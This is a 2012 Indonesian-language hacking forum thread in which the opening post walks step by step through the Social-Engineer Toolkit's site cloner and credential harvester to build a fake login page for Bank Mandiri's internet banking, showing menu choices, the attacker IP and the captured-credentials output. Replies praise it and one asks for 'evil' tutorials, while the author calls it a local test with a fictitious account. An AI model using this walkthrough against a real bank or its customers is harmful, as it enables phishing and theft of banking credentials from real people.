Share site clone with SET on Backtrack 5r3 - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Social Engineering (https://www.indonesianbacktrack.or.id/forum/forum-185.html) +--- Thread: Share site clone with SET on Backtrack 5r3 (/thread-3548.html) Pages:
1
2
|
site clone with SET on Backtrack 5r3 - xsan-lahci - 08-23-2012 ok sebelumnya ane mo ucapin MinalAidinwalfaidzin yah buat semua penghuni indonesian backtrack semoga semakin ganteng dan apa adanya hahaha oke sesuai judul nih ane mo berbagi cara soceng dari SET membuat fakelogin bank mandiri kali ini hahaha just for share oke tools yg dibutuhkan 1. Doa 2. Backtrack 5R3 3. SET 4. wifi oke pertama baca doa semoga berhasil kedua kitabuka setnya bt@xsan-lahci:~# cd /pentest/exploits/set/ bt@xsan-lahci:/pentest/exploits/set# ./set nanti ada pilihan kaya gini Do you agree to the terms of service [y/n]: y terus terbuka deh pilihannya kaya gini Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 6) Update SET configuration 7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 <------------ pilih no 1 terus terbuka lagi kaya gini Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) QRCode Generator Attack Vector 10) Powershell Attack Vectors 11) Third Party Modules 99) Return back to the main menu. set> 2 <------ pilih no 2 oke next terbuka pilihan kaya gini The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful. 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Victim Web Profiler 9) Create or import a CodeSigning Certificate 99) Return to Main Menu set:webattack>3 The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality. 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>2 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing: 192.168.1.102 <--- isikan ip attacker [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone: https://ib.bankmandiri.co.id <------- isikan website yg akan dibuat fakelogin tunggu beberapa saat nanti akan keluar tulisan seperti ini [*] Cloning the website: https://ib.bankmandiri.co.id [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [!] I have read the above message. Press <return> to continue [*] Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: oke perhatingan deh bro tulisan warna biru di atas,itu adalah proses dimana sebuah fakelogin berjalan pada port 80 dimana itu adalah service http automatic fakelogin telah dibuatkan oleh tools set kita kembali ke pembahasan lihat gambar di atas perhatikan deh baris paling bawah si victim nampaknya mulai mengakses site cloningan kita tuh hahaha binggo checkthis out hahaha i got username and password hahaha login bank mandiri note : tested on blackberry phone punya om zasad oke sekian dl ya tutorial cupu ane just for share dont use for blackhat job thanks to om zasad , ares , cassaprodigy , zee eichel , dan om wildhanovsky saatnya prepare pindahan markas RE: (share)site clone with SET on Backtrack 5r3 - iKONspirasi - 08-24-2012 ngeriii, maenannya soceng nice share bro, +2 dari ane RE: (share)site clone with SET on Backtrack 5r3 - xsan-lahci - 08-24-2012 hehe makasih banyak nih om ikons commingsoon ane buat lg tut dengan Soceng yg lain RE: (share)site clone with SET on Backtrack 5r3 - cassaprodigy - 08-25-2012 hahhahaa... pasti hacker ni.. tapi klo cek ip na bsa ktauan nda buat tw tu fake ap bukan.. hhahaa RE: (share)site clone with SET on Backtrack 5r3 - xsan-lahci - 08-25-2012 hahaha itu mah akun fiktif om yg buka site cloningnya om zasad pake bb semalem RE: (share)site clone with SET on Backtrack 5r3 - cassaprodigy - 08-25-2012 +1 dari ane.. hahahha.. buat tread yg jahat2 donk,, hahha RE: (share)site clone with SET on Backtrack 5r3 - xsan-lahci - 08-25-2012 wakakaka makasih om surem idenya , ane mah orang ganteng dan apa adanya om bukan jahat hehehe RE: (share)site clone with SET on Backtrack 5r3 - redgoku - 09-09-2012 ini cuma untuk local network ya bro? RE: (share)site clone with SET on Backtrack 5r3 - Al - Ayyubi - 09-10-2012 om ganteng ngeri maenannya ajarin ane om RE: (share)site clone with SET on Backtrack 5r3 - xsan-lahci - 09-10-2012 (09-09-2012, 08:57 PM)redgoku Wrote: ini cuma untuk local network ya bro? iya bro ane cuma test di local network aja , mungkin ente bisa cb di jaringan yg lebih luas |